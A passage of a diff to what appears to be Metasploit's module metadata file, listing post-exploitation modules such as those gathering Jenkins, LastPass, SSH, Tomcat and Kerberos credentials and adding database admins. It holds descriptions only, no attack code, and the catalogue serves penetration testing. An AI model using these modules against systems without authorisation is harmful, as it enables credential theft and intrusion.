grabs IRSSI IRC credentials.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/irssi_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/irssi_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/jboss_gather": { - "name": "JBoss Credential Collector", - "fullname": "post/multi/gather/jboss_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe (koen.riepe " - ], - "description": "This module can be used to extract the JBoss admin passwords for version 4, 5 and 6.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/jboss_gather.rb", - "is_install_path": true, - "ref_name": "multi/gather/jboss_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/jenkins_gather": { - "name": "Jenkins Credential Collector", - "fullname": "post/multi/gather/jenkins_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "thesubtlety" - ], - "description": "This module can be used to extract saved Jenkins credentials, user\n tokens, SSH keys, and secrets. 
Interesting files will be stored in\n loot along with combined csv output.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/jenkins_gather.rb", - "is_install_path": true, - "ref_name": "multi/gather/jenkins_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/lastpass_creds": { - "name": "LastPass Vault Decryptor", - "fullname": "post/multi/gather/lastpass_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Garcia Illera ", - "Martin Vigo ", - "Jon Hart " - ], - "description": "This module extracts and decrypts LastPass master login accounts and passwords,\n encryption keys, 2FA tokens and all the vault passwords", - "references": [ - "URL-http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/lastpass_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/lastpass_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/maven_creds": { - "name": "Multi Gather Maven Credentials Collection", - "fullname": "post/multi/gather/maven_creds", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "elenoir" - ], - "description": "This module will collect the contents of all users settings.xml on the targeted\n machine.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/maven_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/maven_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/memory_search": { - "name": "Memory Search", - "fullname": "post/multi/gather/memory_search", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sjanusz-r7" - ], - "description": "This module allows for searching the memory space of running processes for\n potentially sensitive data such as passwords.", - "references": [], - "platform": "Linux,OSX,Unix,Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-24 19:55:53 +0000", - "path": "/modules/post/multi/gather/memory_search.rb", - "is_install_path": true, - "ref_name": "multi/gather/memory_search", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/minio_client": { - "name": "Gather MinIO Client Key", - "fullname": "post/multi/gather/minio_client", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - 
"description": "This module searches for MinIO Client credentials on a Windows host.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/minio_client.rb", - "is_install_path": true, - "ref_name": "multi/gather/minio_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/multi_command": { - "name": "Multi Gather Run Shell Command Resource File", - "fullname": "post/multi/gather/multi_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will read shell commands from a resource file and\n execute the commands in the specified Meterpreter or shell session.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/multi_command.rb", - "is_install_path": true, - "ref_name": "multi/gather/multi_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/netrc_creds": { - "name": "UNIX Gather .netrc Credentials", - "fullname": "post/multi/gather/netrc_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, 
- "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for FTP and other services in .netrc", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/netrc_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/netrc_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/pgpass_creds": { - "name": "Multi Gather pgpass Credentials", - "fullname": "post/multi/gather/pgpass_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Zach Grace " - ], - "description": "This module will collect the contents of all users' .pgpass or pgpass.conf\n file and parse them for credentials.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/pgpass_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/pgpass_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/pidgin_cred": { - "name": "Multi Gather Pidgin Instant Messenger Credential Collection", - "fullname": "post/multi/gather/pidgin_cred", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "Carlos Perez " - ], 
- "description": "This module will collect credentials from the Pidgin IM client if it is installed.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/pidgin_cred.rb", - "is_install_path": true, - "ref_name": "multi/gather/pidgin_cred", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/ping_sweep": { - "name": "Multi Gather Ping Sweep", - "fullname": "post/multi/gather/ping_sweep", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Performs IPv4 ping sweep using the OS included ping command.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/ping_sweep.rb", - "is_install_path": true, - "ref_name": "multi/gather/ping_sweep", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/remmina_creds": { - "name": "UNIX Gather Remmina Credentials", - "fullname": "post/multi/gather/remmina_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are 
encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/remmina_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/remmina_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/resolve_hosts": { - "name": "Multi Gather Resolve Hosts", - "fullname": "post/multi/gather/resolve_hosts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.", - "references": [], - "platform": "Python,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/resolve_hosts.rb", - "is_install_path": true, - "ref_name": "multi/gather/resolve_hosts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/rsyncd_creds": { - "name": "UNIX Gather RSYNC Credentials", - "fullname": "post/multi/gather/rsyncd_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials 
saved for RSYNC in various locations", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/rsyncd_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/rsyncd_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/rubygems_api_key": { - "name": "Multi Gather RubyGems API Key", - "fullname": "post/multi/gather/rubygems_api_key", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jonathan Claudius ", - "Brandon Myers " - ], - "description": "This module obtains a user's RubyGems API key from ~/.gem/credentials.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/rubygems_api_key.rb", - "is_install_path": true, - "ref_name": "multi/gather/rubygems_api_key", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/run_console_rc_file": { - "name": "Multi Gather Run Console Resource File", - "fullname": "post/multi/gather/run_console_rc_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will read console commands from a resource file and\n execute the commands in the specified Meterpreter session.", - "references": [], - 
"platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/run_console_rc_file.rb", - "is_install_path": true, - "ref_name": "multi/gather/run_console_rc_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/saltstack_salt": { - "name": "SaltStack Salt Information Gatherer", - "fullname": "post/multi/gather/saltstack_salt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "c2Vlcgo" - ], - "description": "This module gathers information from SaltStack Salt masters and minions.\n Data gathered from minions: 1. salt minion config file\n Data gathered from masters: 1. minion list (denied, pre, rejected, accepted)\n 2. minion hostname/ip/os (depending on module settings)\n 3. SLS\n 4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed\n 5. minion config files\n 6. 
pillar data", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/multi/gather/saltstack_salt.rb", - "is_install_path": true, - "ref_name": "multi/gather/saltstack_salt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/skype_enum": { - "name": "Multi Gather Skype User Data Enumeration", - "fullname": "post/multi/gather/skype_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate Skype account settings, contact list, call history, chat logs,\n file transfer history, and voicemail logs, saving all the data to CSV files for analysis.", - "references": [], - "platform": "OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/skype_enum.rb", - "is_install_path": true, - "ref_name": "multi/gather/skype_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/ssh_creds": { - "name": "Multi Gather OpenSSH PKI Credentials Collection", - "fullname": "post/multi/gather/ssh_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jim Halfpenny" - ], - "description": "This module will collect the contents of all users' .ssh 
directories on the targeted\n machine. Additionally, known_hosts and authorized_keys and any other files are also\n downloaded. This module is largely based on firefox_creds.rb.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/ssh_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/ssh_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/thunderbird_creds": { - "name": "Multi Gather Mozilla Thunderbird Signon Credential Collection", - "fullname": "post/multi/gather/thunderbird_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect credentials from Mozilla Thunderbird by downloading\n the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for\n offline decryption with third party tools.\n\n If necessary, you may also set the PARSE option to true to parse the sqlite\n file, which contains sensitive information such as the encrypted username/password.\n However, this feature is not enabled by default, because it requires SQLITE3 gem\n to be installed on your machine.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/thunderbird_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/thunderbird_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": 
[ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/tomcat_gather": { - "name": "Gather Tomcat Credentials", - "fullname": "post/multi/gather/tomcat_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe " - ], - "description": "This module will attempt to collect credentials from Tomcat services running on the machine.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/tomcat_gather.rb", - "is_install_path": true, - "ref_name": "multi/gather/tomcat_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/ubiquiti_unifi_backup": { - "name": "Multi Gather Ubiquiti UniFi Controller Backup", - "fullname": "post/multi/gather/ubiquiti_unifi_backup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "zhangyoufu", - "justingist" - ], - "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n and downloads the backup and autobackup files. The files are then decrypted using\n a known encryption key, then attempted to be repaired by zip. 
Meterpreter must be\n used due to the large file sizes, which can be flaky on regular shells to read.\n Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n If the zip can be repaired, the db and its information will be extracted.", - "references": [ - "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/", - "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1", - "URL-https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation", - "URL-https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105" - ], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb", - "is_install_path": true, - "ref_name": "multi/gather/ubiquiti_unifi_backup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/unix_cached_ad_hashes": { - "name": "UNIX Gather Cached AD Hashes", - "fullname": "post/multi/gather/unix_cached_ad_hashes", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tim Brown " - ], - "description": "Post Module to obtain all cached AD hashes on the targeted UNIX machine. 
These can be cracked with John the Ripper (JtR).", - "references": [], - "platform": "AIX,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/unix_cached_ad_hashes.rb", - "is_install_path": true, - "ref_name": "multi/gather/unix_cached_ad_hashes", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/unix_kerberos_tickets": { - "name": "UNIX Gather Kerberos Tickets", - "fullname": "post/multi/gather/unix_kerberos_tickets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tim Brown " - ], - "description": "Post Module to obtain all kerberos tickets on the targeted UNIX machine.", - "references": [], - "platform": "AIX,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/unix_kerberos_tickets.rb", - "is_install_path": true, - "ref_name": "multi/gather/unix_kerberos_tickets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/wlan_geolocate": { - "name": "Multiplatform WLAN Enumeration and Geolocation", - "fullname": "post/multi/gather/wlan_geolocate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tom Sellers " - ], - "description": "Enumerate wireless networks 
visible to the target device.\n Optionally geolocate the target by gathering local wireless networks and\n performing a lookup against Google APIs.", - "references": [], - "platform": "Android,BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/wlan_geolocate.rb", - "is_install_path": true, - "ref_name": "multi/gather/wlan_geolocate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/wowza_streaming_engine_creds": { - "name": "Gather Wowza Streaming Engine Credentials", - "fullname": "post/multi/gather/wowza_streaming_engine_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module collects Wowza Streaming Engine user credentials.", - "references": [ - "URL-https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api", - "URL-https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/wowza_streaming_engine_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/wowza_streaming_engine_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/general/close": 
{ - "name": "Multi Generic Operating System Session Close", - "fullname": "post/multi/general/close", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module closes the specified session. This can be useful as a finisher for automation tasks.", - "references": [], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/general/close.rb", - "is_install_path": true, - "ref_name": "multi/general/close", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/general/execute": { - "name": "Multi Generic Operating System Session Command Execution", - "fullname": "post/multi/general/execute", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module executes an arbitrary command line", - "references": [], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/general/execute.rb", - "is_install_path": true, - "ref_name": "multi/general/execute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/general/wall": { - "name": "Write Messages to Users", - "fullname": "post/multi/general/wall", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "This module utilizes the wall(1) or write(1) utilities, as appropriate,\n to send messages to users on the target system.", - "references": [], - "platform": "Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/general/wall.rb", - "is_install_path": true, - "ref_name": "multi/general/wall", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/autoroute": { - "name": "Multi Manage Network Route via Meterpreter Session", - "fullname": "post/multi/manage/autoroute", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "todb ", - "Josh Hale \"sn0wfa11\" " - ], - "description": "This module manages session routing via an existing\n Meterpreter session. It enables other modules to 'pivot' through a\n compromised host when connecting to the named NETWORK and SUBMASK.\n Autoadd will search a session for valid subnets from the routing table\n and interface list then add routes to them. Default will add a default\n route so that all TCP/IP traffic not specified in the MSF routing table\n will be routed through the session when pivoting. 
See documentation for more\n 'info -d' and click 'Knowledge Base'", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/autoroute.rb", - "is_install_path": true, - "ref_name": "multi/manage/autoroute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/dbvis_add_db_admin": { - "name": "Multi Manage DbVisualizer Add Db Admin", - "fullname": "post/multi/manage/dbvis_add_db_admin", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, which can be abused to create an administrator in the database with the\n proper database permissions. 
Note: This module currently only supports MySQL.", - "references": [ - "URL-http://youtu.be/0LCLRVHX1vA" - ], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb", - "is_install_path": true, - "ref_name": "multi/manage/dbvis_add_db_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/manage/dbvis_query": { - "name": "Multi Manage DbVisualizer Query", - "fullname": "post/multi/manage/dbvis_query", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). 
